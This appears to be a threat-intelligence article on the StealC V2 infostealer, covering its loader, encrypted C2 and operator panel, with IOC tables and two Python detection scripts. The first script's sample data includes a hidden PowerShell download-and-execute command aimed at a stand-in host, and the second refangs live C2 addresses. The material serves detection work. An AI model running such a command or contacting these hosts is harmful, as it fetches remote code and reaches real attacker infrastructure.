StealC, a prominent infostealer and malware downloader on the cybercrime underground since early 2023, released its much-anticipated version 2 (V2), introducing significant enhancements in both functionality and evasion.
Most notably, V2 introduces advanced payload delivery mechanisms, supporting the execution of Microsoft Software Installer (MSI) packages and PowerShell scripts.
This capability, in addition to traditional EXE execution, marks a pivotal expansion in StealC’s ability to propagate and install secondary payloads within compromised environments.
The malware’s loader can now invoke msiexec.exe with the /passive flag for silent MSI installations, ensuring minimal user disruption and increasing stealth.
PowerShell-based payloads are executed directly using download-and-execute techniques, bypassing many conventional endpoint defenses.
Combined with a robust retry logic for EXE and MSI files, these features enhance payload reliability regardless of delivery channel.
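The two loader behaviours described above (silent MSI installs via msiexec.exe /passive and PowerShell download-and-execute) leave distinctive traces in process-creation telemetry. The following Python is an added detection example written for this article; it is not code from the original report or from Zscaler, and the process records it scans are constructed sample data, not telemetry from a real infection. The field names (parent, image, cmdline) are an assumption modelled on Sysmon Event ID 1.

```python
import re

# Constructed process-creation records (sample data for this example, not real
# telemetry). Field names follow Sysmon Event ID 1 loosely.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\u\Downloads\setup.msi"'},
    {"parent": r"C:\Users\u\AppData\Local\Temp\update.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /passive /i C:\Users\u\AppData\Local\Temp\pkg.msi"},
    {"parent": r"C:\Users\u\AppData\Local\Temp\update.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -nop -w hidden -c "
                r"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},
]

# Unattended-install switches for msiexec. /passive is the one the article
# names; /q, /qn, /qb and /quiet are the other silent variants.
MSI_SILENT = re.compile(r"(?:^|\s)/(?:passive|quiet|q[nb]?)\b", re.IGNORECASE)
# A parent process running out of a user-writable directory is atypical for
# legitimate software installation and is the part that raises suspicion.
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|Downloads|Public|ProgramData)\\",
                           re.IGNORECASE)
# Download primitives and in-memory execution primitives. The two together in
# one command line form the download-and-execute pattern.
PS_DOWNLOAD = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"
    r"|Invoke-RestMethod|Start-BitsTransfer", re.IGNORECASE)
PS_EXEC = re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE)


def image_name(path):
    """Return the lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of rule names that fire for one process-creation event."""
    hits = []
    name = image_name(event["image"])
    cmd = event["cmdline"]
    if (name == "msiexec.exe" and MSI_SILENT.search(cmd)
            and USER_WRITABLE.search(event["parent"])):
        hits.append("silent_msi_from_user_writable_parent")
    if (name in ("powershell.exe", "pwsh.exe")
            and PS_DOWNLOAD.search(cmd) and PS_EXEC.search(cmd)):
        hits.append("powershell_download_and_execute")
    return hits


def scan(events):
    """Map event index -> rule hits, for events that triggered at least one rule."""
    findings = {}
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            findings[i] = hits
    return findings


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["cmdline"][:60], rules)
```

The msiexec rule deliberately requires both the silent switch and a parent in a user-writable path; silent installs from explorer.exe or a packaging agent are common in managed fleets, so the switch alone is a weak signal. The PowerShell rule is equally coarse and will also match admin tooling that pipes a fetched script into IEX, so it is a triage signal rather than a block rule.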
Enhanced Encryption and Evasive C2 Communications
StealC V2’s communication protocol has transitioned to a streamlined, JSON-based format, augmented in recent variants by RC4 encryption for both command-and-control (C2) traffic and internal string obfuscation.

According to ThreatLabz, this dual-layer encryption thwarts static signature detection and complicates reverse engineering efforts.
Unique random keys appended to each C2 message further mitigate the risk of behavioral signatures, ensuring operational security for malicious campaigns.
The initial infection beacon now registers each bot via a hardware identifier (HWID), with the server issuing individualized tasking and exfiltration targets per victim endpoint.
An integrated access token controls session integrity; even request errors are stringently handled with explicit opcodes and error codes, offering both resilience and fine-grained operator feedback.
Advanced Control Panel and Customization Features
On the attacker’s backend, the StealC V2 control panel has been overhauled. It now features a tightly integrated builder allowing real-time customization of payload rules, targeting, and botnet behavior.
Operators can fine-tune delivery logic by geolocation, HWID, installed software, or even specific data markers (e.g., credential files containing target strings like “coinbase.com”).

The unified file grabber collects data from a comprehensive set of applications, including browsers, email clients, instant messengers, VPNs, and crypto wallets, while multi-monitor screenshot functionality expands the scope of visual reconnaissance.
The builder and update mechanisms are tightly controlled via the StealC V2 support team, which distributes versioned binaries and RC4 keys through secure update packages.
This controlled distribution ensures all deployed instances remain compatible and obfuscated, reducing the likelihood of researcher tampering.
StealC V2 has already been observed in advanced multi-stage infection chains, often in conjunction with other malware loaders such as Amadey.
The ongoing development, highlighted by rapid feature rollouts such as enhanced Firefox plugin loading and improved anti-detection techniques, signals a persistent and evolving threat.
Security vendors, including Zscaler, have responded with layered detection coverage, leveraging sandboxing and signature-based approaches under threat names such as Win64.PWS.Stealc.
Indicators of Compromise (IOCs)
| Type | Value | Description |
|---|---|---|
| SHA256 (Packed, Themida) | 0b921636568ee3e1f8ce71ff9c931da5675089ba796b65a6b212440425d63c8c | StealC V2 sample |
| SHA256 (Packed, Themida) | e205646761f59f23d5c8a8483f8a03a313d3b435b302d3a37061840b5cc084c3 | StealC V2 sample |
| SHA256 (Unpacked) | a1b2aecdd1b37e0c7836f5c254398250363ea74013700d9a812c98269752f385 | StealC V2 sample |
| SHA256 (Unpacked) | 27c77167584ce803317eab2eb5db5963e9dfa86450237195f5723185361510dc | StealC V2 sample |
| SHA256 (Dropped Payload) | dd36c7d50cb05761391a7f65932193ec847d34f8ba1bb2f2a43ecf4985d911f4 | Amadey payload |
| SHA256 (Malware dropping StealC V2) | 87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f | Amadey loader |
| C2 Server | http://45.93.20[.]64/c090b39aa5004512.php | StealC V2 C2 |
| C2 Server | http://45.93.20[.]28/3d15e67552d448ff.php | StealC V2 C2 |
| C2 Server | http://88.214.48[.]93/ea2cb15d61cc476f.php | StealC V2 C2 |
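The indicators above are published defanged ("[.]"), so they cannot be compared against raw logs until they are refanged. The Python below is an added example, not code from the article or from Zscaler: it refangs the published C2 URLs and hashes, then sweeps constructed proxy log lines and a constructed EDR file-hash export for exact URL hits, host-only hits (the C2 IP seen with a different path, which still merits a look) and known sample hashes. The log and export formats are assumptions made for the example.

```python
from urllib.parse import urlsplit

# IOCs exactly as published in the table above, still defanged.
C2_URLS = [
    "http://45.93.20[.]64/c090b39aa5004512.php",
    "http://45.93.20[.]28/3d15e67552d448ff.php",
    "http://88.214.48[.]93/ea2cb15d61cc476f.php",
]
SAMPLE_HASHES = {
    "0b921636568ee3e1f8ce71ff9c931da5675089ba796b65a6b212440425d63c8c": "StealC V2 sample (packed, Themida)",
    "e205646761f59f23d5c8a8483f8a03a313d3b435b302d3a37061840b5cc084c3": "StealC V2 sample (packed, Themida)",
    "a1b2aecdd1b37e0c7836f5c254398250363ea74013700d9a812c98269752f385": "StealC V2 sample (unpacked)",
    "27c77167584ce803317eab2eb5db5963e9dfa86450237195f5723185361510dc": "StealC V2 sample (unpacked)",
    "dd36c7d50cb05761391a7f65932193ec847d34f8ba1bb2f2a43ecf4985d911f4": "Amadey payload dropped by StealC V2",
    "87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f": "Amadey loader dropping StealC V2",
}


def refang(value):
    """Reverse the common defanging conventions so values compare to raw logs."""
    return (value.replace("[.]", ".").replace("(.)", ".")
                 .replace("hxxps://", "https://").replace("hxxp://", "http://"))


C2_EXACT = {refang(u) for u in C2_URLS}
C2_HOSTS = {urlsplit(refang(u)).hostname for u in C2_URLS}

# Constructed proxy log lines: "timestamp client method url status". Not real traffic.
PROXY_LOG = [
    "2025-05-01T10:00:00Z 10.0.0.5 GET http://88.214.48.93/ea2cb15d61cc476f.php 200",
    "2025-05-01T10:00:02Z 10.0.0.5 GET http://example.invalid/index.html 200",
    "2025-05-01T10:00:05Z 10.0.0.7 POST http://45.93.20.64/c090b39aa5004512.php 200",
    "2025-05-01T10:00:09Z 10.0.0.7 GET http://45.93.20.28/ 404",
]
# Constructed (path, sha256) pairs in the shape of an EDR file-hash export.
FILE_HASHES = [
    (r"C:\Windows\notepad.exe", "0" * 64),
    (r"C:\Users\u\AppData\Local\Temp\update.exe",
     "87618787E1032BBF6A6CA8B3388EA3803BE20A49E4AFABA1DF38A6116085062F"),
]


def match_proxy(lines):
    """Return (line, verdict) pairs for lines touching a listed C2 URL or host."""
    findings = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue  # malformed line; skip rather than guess a field layout
        url = refang(parts[3])  # some proxies export defanged values too
        if url in C2_EXACT:
            findings.append((line, "c2_url_exact"))
        elif urlsplit(url).hostname in C2_HOSTS:
            findings.append((line, "c2_host_only"))
    return findings


def match_hashes(pairs):
    """Return (path, description) for files whose SHA256 is a listed sample."""
    return [(path, SAMPLE_HASHES[digest.lower()])
            for path, digest in pairs if digest.lower() in SAMPLE_HASHES]


if __name__ == "__main__":
    for line, verdict in match_proxy(PROXY_LOG):
        print(verdict, line)
    for path, desc in match_hashes(FILE_HASHES):
        print("hash match:", path, "->", desc)
```

Hash comparison is case-folded because EDR exports vary in digest case, and the URL match checks the full URL before falling back to the host, so an exact hit on one of the published C2 paths is reported with higher confidence than plain contact with the IP.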